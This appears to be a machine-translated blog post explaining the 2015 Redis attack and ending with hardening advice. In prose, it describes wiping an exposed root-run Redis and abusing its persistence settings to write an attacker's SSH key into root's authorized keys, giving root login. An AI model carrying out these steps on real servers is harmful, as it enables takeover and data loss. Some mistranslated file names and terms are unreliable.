———–

Well, I also did back to the clickbait, as I am so careful students, how could let the server be hacked?

I was talking to a friend yesterday. He told me that he had a cloud server running the Redis database. One day, he found that all the data in the database was gone except for a weird key value pair, whose value looked like a string of RSA public keys. Fortunately, there is no important data in their server, so they do not care.

After some heart-to-heart talk, I learned that he ran an old open source project that had been discontinued, installed the old version of Redis, and he was not very skilled in using Linux. I knew that his server had been compromised. Thinking that there may be many people like my friend who do not pay attention to the operating system permissions, firewall Settings and database protection, I will write an article to briefly look at the reasons for this situation, and how to prevent it.

PS: This is no longer possible, because the new version of Redis has added protect Mode and increased security, so we can only simulate it locally.

The incident

In fact, this kind of attack happened in 2015. At that time, the security protection mechanism of Redis was relatively poor, and it could only be reasonably configured by operation and maintenance personnel to ensure the security of the database. At one point, tens of thousands of Redis nodes around the world were attacked, and the above strange phenomenon occurred. All data was wiped except for a key called crackit, whose value was shaped like a string of RSA public keys.

It was later verified that the attacker took advantage of the functions of dynamic configuration and data persistence of Redis to write his RSA public key into the file /root/.ssh/authored_keys of the attacked server, so that he could directly log in root user of the attacked server with private key and enter the system of the attacked server.

PS: I have carefully written more than 100 original articles and brushed 200 force button topics hand by hand, all of which were published in labuladong’s algorithm cheat sheet and updated continuously. Suggested collection, in accordance with the order of my article brush topic, master all kinds of algorithm set to re-enter the sea of questions like a duck in water.

The captured server security protection is very bad, as follows:

1. The port of Redis is the default port and can be accessed from the public network.

2. Redis doesn’t have a password yet.

3. The Redis process is started by user root.

Each of these points is dangerous, and taken together, it can be deadly. Not to mention someone writing the public key into your system, just connecting to your database and deleting it, that’s a big enough loss. So what is the specific process, the following I in the local loopback address on a simple demonstration.

Local demonstration

The default port that Redis listens on is 6379, and we set it to receive a connection to nic 127.0.0.1, so that I am sure I can connect to Redis from the local network and simulate the condition that Redis is accessible from the public network.

Now I am a normal user named FDL, I want to SSH to log in as root user on my system, I need to enter the password of root, I don’t know, so I can’t log in.

In addition to password login, I can use RSA key pairs, but I have to store my public key in root’s home directory /root/.ssh/ rules. We know that the /root directory has permissions that do not allow other users to intrude on reading and writing:

However, I found myself accessing Redis directly:

If Redis is running as root, I can manipulate Redis to write my public key to root’s home directory. One way Redis persists is by generating RDB files that contain the raw data.

I smiled an evil smile, wiped out all the data in Redis, and wrote my RSA public key to the database. I added line breaks at the beginning and end to avoid damaging the public key string during RDB file generation:

The root command Redis saves the generated data file to the authored_keys file in /root/.ssh/ :

Now that root’s home directory contains our RSA public key, we can use the key pair to log in to root:

Look at the public key we just wrote to root’s home:

Garbled code is a certain code of GDB file, but the public key in the middle is completely preserved, and the SSH login program even recognized the public key surrounded by garbled code!

Now that you have root, you can do whatever you want…

PS: I have carefully written more than 100 original articles and brushed 200 force button topics hand by hand, all of which were published in labuladong’s algorithm cheat sheet and updated continuously. Suggested collection, in accordance with the order of my article brush topic, master all kinds of algorithm set to re-enter the sea of questions like a duck in water.

The lesson

Although it is basically safe from this kind of attack (the new version of Redis is not open to the Internet by default without a password), everyone should pay attention to the security of the system.

We toss things around ourselves, with a low cloud server, in order to save trouble generally do not seriously configure the firewall, the database does not set a password or set into admin, root such a simple password, anyway, there is no what data. It’s definitely not a good habit.

Now that our computer systems have become so sophisticated that every mature project is maintained by the best people, and is technically airtight, the only thing that can go wrong is the people who use them.

Like often see someone’s QQ stolen, I believe that the person who stole the number is certainly not running to Tencent’s database of stolen number, certainly QQ number is the main security awareness is poor, in which phishing website input their account password, resulting in stolen. I have almost never seen wechat stolen, which may be the reason why wechat weakens password login and uses TWO-DIMENSIONAL code scanning login. This should be a security consideration, after all, wechat has a payment function.

These scams are easy for techies to spot by looking at the URL and the browser analyzing the web package, but believe it or not, the average person really can’t figure out how to tell a phishing site from an official site. Like I can’t believe it’s 2020 and there are still people looking for this Redis bug, and there are still people falling for it…

So back to the use of Redis database, there are clearly written security protection suggestions on the official website. Let me briefly summarize:

1, do not use root user to start Redis Server, and must set a password, and the password is not too short, or it is easy to brute force cracking.

2, configure the server firewall and Redis config file, try not to let Redis contact with the outside world.

3, use the rename function to disguise the flushall dangerous command to prevent repository deletion and data loss.

_____________

My online e-book has 100 original articles, hand handle with brush 200 force buckle topic, suggest collection! The corresponding GitHub algorithm repository has been awarded 70K Star, welcome standard star!